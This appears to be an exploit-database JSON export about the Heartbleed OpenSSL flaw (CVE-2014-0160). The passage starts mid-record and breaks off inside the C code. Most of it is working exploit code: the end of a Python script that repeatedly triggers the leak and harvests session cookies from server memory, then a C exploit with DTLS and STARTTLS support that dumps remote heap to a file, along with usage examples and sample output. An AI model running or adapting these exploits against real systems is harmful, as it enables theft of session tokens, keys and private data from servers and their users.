(default: session)') \n \n \ndef h2bin(x): \nreturn x.replace(' ', '').replace('\\n', '').decode('hex') \n \nhello = h2bin(''' \n16 03 02 00 dc 01 00 00 d8 03 02 53 \n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf \nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 \n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 \n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c \nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 \nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 \nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c \nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 \n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 \n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 \n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 \n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 \n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 \n00 0f 00 01 01 \n''') \n \nhb = h2bin(''' \n18 03 02 00 03 \n01 40 00 \n''') \n \n \nclass HeartBleeder(object): \n \nserver_response = None \nsocket = None \nhostname = '' \nport = 443 \nfound_sessions = set() \ncookie = 'session' \ncookie_length = 56 \n \ndef __init__(self, hostname='', cookie=''): \nself.hostname = hostname \nself.cookie = cookie \n \ndef connect(self): \n\"\"\" \nConnects to the remote server. \n\"\"\" \nself.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nsys.stdout.flush() \nself.socket.connect((self.hostname, self.port)) \nsys.stdout.flush() \nself.socket.send(hello) \nsys.stdout.flush() \n \ndef rcv_response(self): \nwhile True: \n_type, version, payload = self.rcv_message() \nif _type is None: \nprint 'Server closed connection without sending Server Hello.' \nreturn \n# Look for server hello done message. 
\nif _type == 22 and ord(payload[0]) == 0x0E: \nbreak \n \ndef rcv_message(self): \n \nrecord_header = self.rcv_all(5) \nif record_header is None: \nprint 'Unexpected EOF receiving record header - server closed connection' \nreturn None, None, None \n_type, version, line = struct.unpack('>BHH', record_header) \npayload = self.rcv_all(line, 10) \nif payload is None: \nprint 'Unexpected EOF receiving record payload - server closed connection' \nreturn None, None, None \n# print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) \nreturn _type, version, payload \n \ndef rcv_all(self, length, timeout=5): \nendtime = time.time() + timeout \nrdata = '' \nremain = length \nwhile remain > 0: \nrtime = endtime - time.time() \nif rtime < 0: \nreturn None \nr, w, e = select.select([self.socket], [], [], 5) \nif self.socket in r: \ndata = self.socket.recv(remain) \n# EOF? \nif not data: \nreturn None \nrdata += data \nremain -= len(data) \nreturn rdata \n \ndef try_heartbeat(self): \nself.socket.send(hb) \nwhile True: \n_type, version, self.payload = self.rcv_message() \nif _type is None: \nprint 'No heartbeat response received, server likely not vulnerable' \nreturn False \n \nif _type == 24: \n# print 'Received heartbeat response:' \nself.parse_response() \nif len(self.payload) > 3: \npass \n# print 'WARNING: server returned more data than it should - server is vulnerable!' \nelse: \nprint 'Server processed malformed heartbeat, but did not return any extra data.' \nreturn True \n \nif _type == 21: \nprint 'Received alert:' \nself.hexdump(self.payload) \nprint 'Server returned error, likely not vulnerable' \nreturn False \n \ndef parse_response(self): \n\"\"\" \nParses the response from the server for a session id. 
\n\"\"\" \nascii = ''.join((c if 32 <= ord(c) <= 126 else ' ')for c in self.payload) \nindex = string.find(ascii, self.cookie) \nif index >= 0: \ninfo = ascii[index:index + self.cookie_length] \nsession = info.split(' ')[0] \nsession = string.replace(session, ';', '') \nif session not in self.found_sessions: \nself.found_sessions.add(session) \nprint session \n \ndef hexdump(self, payload): \n\"\"\" \nPrints out a hexdump in the event that server returns an error. \n\"\"\" \nfor b in xrange(0, len(payload), 16): \nline = [c for c in payload[b:b + 16]] \nhxdat = ' '.join('%02X' % ord(c) for c in line) \npdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in line) \nprint ' %04x: %-48s %s' % (b, hxdat, pdat) \nprint \n \ndef scan(self): \nself.connect() \nself.rcv_response() \nself.try_heartbeat() \n \n \ndef main(): \nopts, args = options.parse_args() \nif len(args) < 1: \noptions.print_help() \nreturn \n \ncookies_str = 'session' \nif len(args) > 1: \ncookies_str = args[1] \n \nprint cookies_str \n \nwhile True: \nheartbeat = HeartBleeder(hostname=args[0], cookie=cookies_str) \nheartbeat.scan() \n \n \nif __name__ == '__main__': \nmain() \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126069/heartbleed-altered.py.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOpenSSL TLS Heartbeat Extension - Heartbleed Information Leak (2) (DTLS Support)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2014-04-24T00:00:00", "title": "OpenSSL 
TLS Heartbeat Extension - Heartbleed Information Leak (2) (DTLS Support)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-24T00:00:00", "id": "EXPLOITPACK:1020403320036D688D074B47660E9F50", "href": "", "sourceData": "/* \n* CVE-2014-0160 heartbleed OpenSSL information leak exploit\n* =========================================================\n* This exploit uses OpenSSL to create an encrypted connection\n* and trigger the heartbleed leak. The leaked information is\n* returned within encrypted SSL packets and is then decrypted \n* and wrote to a file to annoy IDS/forensics. The exploit can \n* set heartbeat payload length arbitrarily or use two preset \n* values for NULL and MAX length. The vulnerability occurs due \n* to bounds checking not being performed on a heap value which \n* is user supplied and returned to the user as part of DTLS/TLS \n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to \n* 1.0.1f are known affected. You must run this against a target \n* which is linked to a vulnerable OpenSSL library using DTLS/TLS.\n* This exploit leaks upto 65532 bytes of remote heap each request\n* and can be run in a loop until the connected peer ends connection.\n* The data leaked contains 16 bytes of random padding at the end.\n* The exploit can be used against a connecting client or server,\n* it can also send pre_cmd's to plain-text services to establish\n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. 
Clients\n* will often forcefully close the connection during large leak\n* requests so try to lower your payload request size. \n*\n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g \n*\n* E.g.\n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed\n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n* [ =============================================================\n* [ connecting to 192.168.11.23 443/tcp\n* [ connected to 192.168.11.23 443/tcp\n* [ <3 <3 <3 heart bleed <3 <3 <3\n* [ heartbeat returned type=24 length=16408\n* [ decrypting SSL packet\n* [ heartbleed leaked length=65535\n* [ final record type=24, length=16384\n* [ wrote 16381 bytes of heap to file 'out'\n* [ heartbeat returned type=24 length=16408\n* [ decrypting SSL packet\n* [ final record type=24, length=16384\n* [ wrote 16384 bytes of heap to file 'out'\n* [ heartbeat returned type=24 length=16408\n* [ decrypting SSL packet\n* [ final record type=24, length=16384\n* [ wrote 16384 bytes of heap to file 'out'\n* [ heartbeat returned type=24 length=16408\n* [ decrypting SSL packet\n* [ final record type=24, length=16384\n* [ wrote 16384 bytes of heap to file 'out'\n* [ heartbeat returned type=24 length=42\n* [ decrypting SSL packet\n* [ final record type=24, length=18\n* [ wrote 18 bytes of heap to file 'out'\n* [ done.\n* $ ls -al out\n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out\n* $ hexdump -C out\n* - snip - snip \n*\n* Use following example command to generate certificates for clients.\n*\n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\n* -keyout server.key -out server.crt\n*\n* Debian compile with \"gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto\" \n*\n* todo: add udp/dtls support.\n*\n* - Hacker Fantastic\n* http://www.mdsec.co.uk\n*\n*/\n\n/* Modified by Ayman Sagy aymansagy @ gmail.com - Added DTLS over UDP support\n*\n* use -u switch, 
tested against s_server/s_client version 1.0.1d\n* \n* # openssl s_server -accept 990 -cert ssl.crt -key ssl.key -dtls1\n* ...\n* # ./heartbleed -s 192.168.75.235 -p 990 -f eshta -t 1 -u\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n* [ =============================================================\n* [ <3 <3 <3 heart bleed <3 <3 <3\n* [ heartbeat returned type=24 length=1392\n* [ decrypting SSL packet\n* [ heartbleed leaked length=1336\n* [ final record type=24, length=1355\n* [ wrote 1352 bytes of heap to file 'eshta'\n* \n* \n* # hexdump -C eshta \n* \n* \n* # openssl s_client -connect localhost:990 -dtls1\n* ...\n* # ./heartbleed -b localhost -p 990 -u -t 1 -f eshta\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n* [ =============================================================\n* [ SSL connection using AES256-SHA\n* [ <3 <3 <3 heart bleed
<3 <3 <3\n* [ heartbeat returned type=24 length=1392\n* [ decrypting SSL packet\n* [ heartbleed leaked length=1336\n* [ final record type=24, length=1355\n* [ wrote 1352 bytes of heap to file 'eshta'\n* \n* \n* # hexdump -C eshta \n* \n*/\n#include <stdio.h>\n#include <stdint.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <getopt.h>\n#include <signal.h>\n#include <netdb.h>\n#include <fcntl.h>\n#include <errno.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <netinet/in.h>\n#include <inttypes.h>\n#include <openssl/bio.h>\n#include <openssl/ssl.h>\n#include <openssl/err.h>\n#include <openssl/evp.h>\n#include <openssl/tls1.h>\n#include <openssl/rand.h>\n#include <openssl/buffer.h>\n\n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\n\t\t(((unsigned int)(c[1])) )),c+=2)\n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\n\t\t c[1]=(unsigned char)(((s)
)&0xff)),c+=2)\n\nint first = 0;\nint leakbytes = 0;\nint repeat = 1;\nint badpackets = 0;\n\ntypedef struct {\n\tint socket;\n\tSSL *sslHandle;\n\tSSL_CTX *sslContext;\n} connection;\n\ntypedef struct {\n unsigned char type;\n short version;\n unsigned int length;\n unsigned char hbtype;\n unsigned int payload_length;\n void* payload;\n} heartbeat;\n\nvoid ssl_init();\nvoid usage();\nint tcp_connect(char*,int);\nint tcp_bind(char*, int);\nconnection* tls_connect(int);\nconnection* tls_bind(int);\nint pre_cmd(int,int,int);\nvoid* heartbleed(connection* ,unsigned int);\nvoid* sneakyleaky(connection* ,char*, int);\n\nstatic DTLS1_BITMAP *dtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch);\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap);\nstatic int dtls1_buffer_record(SSL *s, record_pqueue *q, unsigned char *priority);\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap);\n\nint tcp_connect(char* server,int port){\n\tint sd,ret;\n\tstruct hostent *host;\n struct sockaddr_in sa;\n host = gethostbyname(server);\n sd = socket(AF_INET, SOCK_STREAM, 0);\n if(sd==-1){\n\t\tprintf(\"[!] cannot create socket\\n\");\n\t\texit(0);\n\t}\n\tsa.sin_family = AF_INET;\n sa.sin_port = htons(port);\n sa.sin_addr = *((struct in_addr *) host->h_addr);\n bzero(&(sa.sin_zero),8);\n\tprintf(\"[ connecting to %s %d/tcp\\n\",server,port);\n ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));\n\tif(ret==0){\n\t\tprintf(\"[ connected to %s %d/tcp\\n\",server,port);\n\t}\n\telse{\n\t\tprintf(\"[!] FATAL: could not connect to %s %d/tcp\\n\",server,port);\n\t\texit(0);\n\t}\n\treturn sd;\n}\n\nint tcp_bind(char* server, int port){\n\tint sd, ret, val=1;\n\tstruct sockaddr_in sin;\n\tstruct hostent *host;\n\thost = gethostbyname(server);\n\tsd=socket(AF_INET,SOCK_STREAM,0);\n\tif(sd==-1){\n \t\tprintf(\"[!] 
cannot create socket\\n\");\n\t\texit(0);\n\t}\n\tmemset(&sin,0,sizeof(sin));\n\tsin.sin_addr=*((struct in_addr *) host->h_addr);\n\tsin.sin_family=AF_INET;\n\tsin.sin_port=htons(port);\n \tsetsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));\n\tret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));\n\tif(ret==-1){\n\t\tprintf(\"[!] cannot bind socket\\n\");\n\t\texit(0);\n\t}\n\tlisten(sd,5);\n\treturn(sd);\n}\n\nconnection* dtls_server(int sd, char* server,int port){\n\tint bytes;\n connection *c;\n char* buf;\n\tbuf = malloc(4096);\n\tint ret;\n\tstruct hostent *host;\n struct sockaddr_in sa;\n\tunsigned long addr;\n if ((host = gethostbyname(server)) == NULL) {\n\t\tperror(\"gethostbyname\");\n\t\texit(1);\n\t}\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\n if(sd==-1){\n\t\tprintf(\"[!] cannot create socket\\n\");\n\t\texit(0);\n\t}\n\tsa.sin_family = AF_INET;\n sa.sin_port = htons(port);\n sa.sin_addr = *((struct in_addr *) host->h_addr);\n\tif (bind(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\n\t\tperror(\"bind()\");\n\t\texit(1);\n\t}\n\n\tBIO *bio;\n if(c==NULL){\n\t\tprintf(\"[ error in malloc()\\n\");\n\t\texit(0);\n\t}\n if(buf==NULL){\n printf(\"[ error in malloc()\\n\");\n exit(0);\n }\n\tmemset(buf,0,4096);\n\tc = malloc(sizeof(connection));\n\tif(c==NULL){\n printf(\"[ error in malloc()\\n\");\n exit(0);\n }\n\tc->socket = sd;\n c->sslHandle = NULL;\n c->sslContext = NULL;\n c->sslContext = SSL_CTX_new(DTLSv1_server_method());\n\tSSL_CTX_set_read_ahead (c->sslContext, 1);\n if(c->sslContext==NULL)\n ERR_print_errors_fp(stderr);\n\tSSL_CTX_SRP_CTX_init(c->sslContext);\n\tSSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM);\n\tSSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \n\tif(!SSL_CTX_check_private_key(c->sslContext)){\n\t\tprintf(\"[!] 
FATAL: private key does not match the certificate public key\\n\");\n\t\texit(0);\n\t}\n\tc->sslHandle = SSL_new(c->sslContext);\n if(c->sslHandle==NULL)\n ERR_print_errors_fp(stderr);\n if(!SSL_set_fd(c->sslHandle,c->socket))\n ERR_print_errors_fp(stderr);\n bio = BIO_new_dgram(sd, BIO_NOCLOSE);\n\n SSL_set_bio(c->sslHandle, bio, bio);\n SSL_set_accept_state (c->sslHandle);\n\n int rc = SSL_accept(c->sslHandle);\n\tprintf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle));\n//\tbytes = SSL_read(c->sslHandle, buf, 4095);\n//\tprintf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf);\n\tif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\n }\n return c;\n}\n\nvoid ssl_init(){\n SSL_load_error_strings();\n SSL_library_init();\n OpenSSL_add_all_digests();\n OpenSSL_add_all_algorithms();\n OpenSSL_add_all_ciphers();\n}\n\nconnection* tls_connect(int sd){\n connection *c;\n\tc = malloc(sizeof(connection));\n if(c==NULL){\n\t\tprintf(\"[ error in malloc()\\n\");\n\t\texit(0);\n\t}\n\tc->socket = sd;\n c->sslHandle = NULL;\n c->sslContext = NULL;\n c->sslContext = SSL_CTX_new(SSLv23_client_method());\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\n if(c->sslContext==NULL)\n ERR_print_errors_fp(stderr);\n c->sslHandle = SSL_new(c->sslContext);\n if(c->sslHandle==NULL)\n ERR_print_errors_fp(stderr);\n if(!SSL_set_fd(c->sslHandle,c->socket))\n ERR_print_errors_fp(stderr);\n if(SSL_connect(c->sslHandle)!=1)\n ERR_print_errors_fp(stderr);\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\n }\n\treturn c;\n}\n\nconnection* dtls_client(int sd, char* server,int port){\n\tint ret;\n\tstruct hostent 
*host;\n struct sockaddr_in sa;\n connection *c;\n\tmemset((char *)&sa,0,sizeof(sa));\n\tc = malloc(sizeof(connection));\n if ((host = gethostbyname(server)) == NULL) {\n\t\tperror(\"gethostbyname\");\n\t\texit(1);\n\t}\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\n if(sd==-1){\n\t\tprintf(\"[!] cannot create socket\\n\");\n\t\texit(0);\n\t}\n\tsa.sin_family = AF_INET;\n sa.sin_port = htons(port);\n sa.sin_addr = *((struct in_addr *) host->h_addr);\n\tif (connect(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\n\t\tperror(\"connect()\");\n\t\texit(0);\n\t}\n\n\tBIO *bio;\n if(c==NULL){\n\t\tprintf(\"[ error in malloc()\\n\");\n\t\texit(0);\n\t}\n\n c->sslContext = NULL;\n c->sslContext = SSL_CTX_new(DTLSv1_client_method());\n\tSSL_CTX_set_read_ahead (c->sslContext, 1);\n if(c->sslContext==NULL)\n ERR_print_errors_fp(stderr);\n if(c->sslHandle==NULL)\n ERR_print_errors_fp(stderr);\n\n\tc->socket = sd;\n c->sslHandle = NULL;\n c->sslHandle = SSL_new(c->sslContext);\n\tSSL_set_tlsext_host_name(c->sslHandle,server);\n\tbio = BIO_new_dgram(sd, BIO_NOCLOSE);\n\n\tBIO_ctrl_set_connected(bio, 1, &sa);\n\tSSL_set_bio(c->sslHandle, bio, bio);\n\tSSL_set_connect_state (c->sslHandle);\n//printf(\"eshta\\n\");\n if(SSL_connect(c->sslHandle)!=1) \n ERR_print_errors_fp(stderr);\n\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\n printf(\"[ warning: heartbeat extension is unsupported (try anyway), %d \\n\",c->sslHandle->tlsext_heartbeat);\n }\n\treturn c;\n}\n\nconnection* tls_bind(int sd){\n\tint bytes;\n connection *c;\n char* buf;\n\tbuf = malloc(4096);\n if(buf==NULL){\n printf(\"[ error in malloc()\\n\");\n exit(0);\n }\n\tmemset(buf,0,4096);\n\tc = malloc(sizeof(connection));\n\tif(c==NULL){\n printf(\"[ error in malloc()\\n\");\n exit(0);\n }\n\tc->socket = sd;\n c->sslHandle = NULL;\n c->sslContext = NULL;\n c->sslContext = SSL_CTX_new(SSLv23_server_method());\n 
if(c->sslContext==NULL)\n ERR_print_errors_fp(stderr);\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\n\tSSL_CTX_SRP_CTX_init(c->sslContext);\n\tSSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM);\n\tSSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \n\tif(!SSL_CTX_check_private_key(c->sslContext)){\n\t\tprintf(\"[!] FATAL: private key does not match the certificate public key\\n\");\n\t\texit(0);\n\t}\n\tc->sslHandle = SSL_new(c->sslContext);\n if(c->sslHandle==NULL)\n ERR_print_errors_fp(stderr);\n if(!SSL_set_fd(c->sslHandle,c->socket))\n ERR_print_errors_fp(stderr);\n int rc = SSL_accept(c->sslHandle);\n\tprintf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle));\n\tbytes = SSL_read(c->sslHandle, buf, 4095);\n\tprintf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf);\n\tif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\n }\n return c;\n}\n\nint pre_cmd(int sd,int precmd,int verbose){\n\t/* this function can be used to send commands to a plain-text\n\tservice or client before heartbleed exploit attempt. e.g. 
STARTTLS */\n\tint rc, go = 0;\n\tchar* buffer;\n\tchar* line1;\n\tchar* line2; \n\tswitch(precmd){\n\t\tcase 0:\n\t\t\tline1 = \"EHLO test\\n\";\n\t\t\tline2 = \"STARTTLS\\n\";\n\t\t\tbreak;\n\t\tcase 1:\n\t\t\tline1 = \"CAPA\\n\";\n\t\t\tline2 = \"STLS\\n\";\n\t\t\tbreak;\n\t\tcase 2:\n\t\t\tline1 = \"a001 CAPB\\n\";\n\t\t\tline2 = \"a002 STARTTLS\\n\";\n\t\t\tbreak;\n\t\tdefault:\n\t\t\tgo = 1;\n\t\t\tbreak;\n\t}\n\tif(go==0){\n\t\tbuffer = malloc(2049);\n\t if(buffer==NULL){\n \tprintf(\"[ error in malloc()\\n\");\n \texit(0);\n\t }\n\t\tmemset(buffer,0,2049);\n\t\trc = read(sd,buffer,2048);\n\t\tprintf(\"[ banner: %s\",buffer);\n\t\tsend(sd,line1,strlen(line1),0);\n\t\tmemset(buffer,0,2049);\n\t\trc = read(sd,buffer,2048);\n\t\tif(verbose==1){\n\t\t\tprintf(\"%s\\n\",buffer);\n\t\t}\n\t\tsend(sd,line2,strlen(line2),0);\n\t\tmemset(buffer,0,2049);\n\t\trc = read(sd,buffer,2048);\n\t\tif(verbose==1){\n\t\t\tprintf(\"%s\\n\",buffer);\n\t\t}\n\t}\n\treturn sd;\n}\n\nvoid* heartbleed(connection *c,unsigned int type){\n\tunsigned char *buf, *p;\n int ret;\n\tbuf = OPENSSL_malloc(1 + 2);\n\tif(buf==NULL){\n printf(\"[ error in malloc()\\n\");\n exit(0);\n }\n\tp = buf;\n *p++ = TLS1_HB_REQUEST;\n\tswitch(type){\n\t\tcase 0:\n\t\t\ts2n(0x0,p);\n\t\t\tbreak;\n\t\tcase 1:\n\t\t\ts2n(0xffff,p);\n\t\t\tbreak;\n\t\tdefault:\n\t\t\tprintf(\"[ setting heartbeat payload_length to %u\\n\",type);\n\t\t\ts2n(type,p);\n\t\t\tbreak;\n\t}\n\tprintf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\");\n ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);\n OPENSSL_free(buf);\n\treturn c;\n}\n\nvoid* dtlsheartbleed(connection *c,unsigned int type){\n\n\tunsigned char *buf, *p;\n int ret;\n\tbuf = OPENSSL_malloc(1 + 2 + 16);\n\tmemset(buf, '\\0', sizeof buf);\n\tif(buf==NULL){\n printf(\"[ error in malloc()\\n\");\n exit(0);\n }\n\tp = buf;\n *p++ = TLS1_HB_REQUEST;\n\tswitch(type){\n\t\tcase 0:\n\t\t\ts2n(0x0,p);\n\t\t\tbreak;\n\t\tcase 
1:\n//\t\t\ts2n(0xffff,p);\n//\t\t\ts2n(0x3feb,p);\n\t\t\ts2n(0x0538,p);\n\t\t\tbreak;\n\t\tdefault:\n\t\t\tprintf(\"[ setting heartbeat payload_length to %u\\n\",type);\n\t\t\ts2n(type,p);\n\t\t\tbreak;\n\t}\n\ts2n(c->sslHandle->tlsext_hb_seq, p);\n\tprintf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\");\n\n ret = dtls1_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3 + 16);\n\n\tif (ret >= 0)\n\t\t{\n\t\tif (c->sslHandle->msg_callback)\n\t\t\tc->sslHandle->msg_callback(1, c->sslHandle->version, TLS1_RT_HEARTBEAT,\n\t\t\t\tbuf, 3 + 16,\n\t\t\t\tc->sslHandle, c->sslHandle->msg_callback_arg);\n\n\t\tdtls1_start_timer(c->sslHandle);\n\t\tc->sslHandle->tlsext_hb_pending = 1;\n\t\t}\n\n OPENSSL_free(buf);\n\n\treturn c;\n}\n\nvoid* sneakyleaky(connection *c,char* filename, int verbose){\n\tchar *p;\n int ssl_major,ssl_minor,al;\n int enc_err,n,i;\n SSL3_RECORD *rr;\n SSL_SESSION *sess;\n\tSSL* s;\n unsigned char md[EVP_MAX_MD_SIZE];\n short version;\n unsigned mac_size, orig_len;\n size_t extra;\n rr= &(c->sslHandle->s3->rrec);\n sess=c->sslHandle->session;\n s = c->sslHandle;\n if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)\n extra=SSL3_RT_MAX_EXTRA;\n else\n extra=0;\n if ((s->rstate != SSL_ST_READ_BODY) ||\n (s->packet_length < SSL3_RT_HEADER_LENGTH)) {\n n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\n if (n <= 0)\n goto apple; \n s->rstate=SSL_ST_READ_BODY;\n p=s->packet;\n rr->type= *(p++);\n ssl_major= *(p++);\n ssl_minor= *(p++);\n version=(ssl_major<<8)|ssl_minor;\n n2s(p,rr->length);\n\t\t\tif(rr->type==24){\n\t\t\t\tprintf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length);\n\t\t\t\tif(rr->length > 16834){\n\t\t\t\t\tprintf(\"[ error: got a malformed TLS length.\\n\");\n\t\t\t\t\texit(0);\n\t\t\t\t}\n\t\t\t}\n\t\t\telse{\n\t\t\t\tprintf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length);\n\t\t\t\ts->packet_length=0;\n\t\t\t\tbadpackets++;\n\t\t\t\tif(badpackets > 3){\n\t\t\t\t\tprintf(\"[ 
error: too many bad packets recieved\\n\");\n\t\t\t\t\texit(0);\n\t\t\t\t}\n\t\t\t\tgoto apple;\n\t\t\t}\n }\n if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){\n i=rr->length;\n n=ssl3_read_n(s,i,i,1);\n if (n <= 0) goto apple; \n }\n\tprintf(\"[ decrypting SSL packet\\n\");\n s->rstate=SSL_ST_READ_HEADER; \n rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);\n rr->data=rr->input;\n tls1_enc(s,0);\n if((sess != NULL) &&\n (s->enc_read_ctx != NULL) &&\n (EVP_MD_CTX_md(s->read_hash) != NULL))\n {\n unsigned char *mac = NULL;\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\n mac_size=EVP_MD_CTX_size(s->read_hash);\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\n orig_len = rr->length+((unsigned int)rr->type>>8);\n if(orig_len < mac_size ||\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\n orig_len < mac_size+1)){\n al=SSL_AD_DECODE_ERROR;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\n }\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\n mac = mac_tmp;\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\n rr->length -= mac_size;\n }\n else{\n rr->length -= mac_size;\n mac = &rr->data[rr->length];\n }\n i = tls1_mac(s,md,0);\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\n enc_err = -1;\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)\n enc_err = -1;\n }\n if(enc_err < 0){\n al=SSL_AD_BAD_RECORD_MAC;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\n goto apple;\n }\n if(s->expand != NULL){\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {\n al=SSL_AD_RECORD_OVERFLOW;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\n goto apple;\n }\n if (!ssl3_do_uncompress(s)) {\n al=SSL_AD_DECOMPRESSION_FAILURE;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\n goto apple;\n }\n }\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {\n 